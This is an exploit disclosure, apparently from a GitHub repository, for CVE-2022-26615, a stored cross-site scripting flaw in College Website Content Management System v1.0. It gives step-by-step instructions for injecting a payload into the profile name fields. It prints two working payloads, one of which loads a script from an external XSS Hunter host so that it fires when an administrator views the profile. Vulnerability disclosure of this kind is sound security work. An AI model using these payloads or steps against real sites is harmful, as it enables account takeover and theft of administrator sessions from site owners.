Headline
CVE-2022-26615: OpenSource/exploit_xss_cwms at main · nsparker1337/OpenSource
A cross-site scripting (XSS) vulnerability in College Website Content Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User Profile Name text fields.
# Exploit Title: College Website - Content Management System v1.0 - Stored(Blind) Cross Site Scripting(XSS)
# Exploit Author: NS Kumar (n1_x)
# Date: March 4, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cwms.zip
# Tested on: Parrot Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# College Website - Content Management System v1.0 suffers from Stored(Blind) XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.
````````````````````````````````````````To Exploit````````````````````````````````````````````````````````
Step 1: Goto Profile Page
Step 2: Put XSS Hunter or Any other Payload on Either First Name or Last Name field
Step 3: Wait for Admin to view your details or Just Reload the page you can see the popup shows up
Step 4: Then you will see xss fires alert on xss hunter page
Payload Used for this Exploit: "><script src=https://d4.xss.ht></script> or <script>confirm(‘Testing for XSS’)</script>
`````````````````````````````````````````````````````````````````````````````````````````````````````````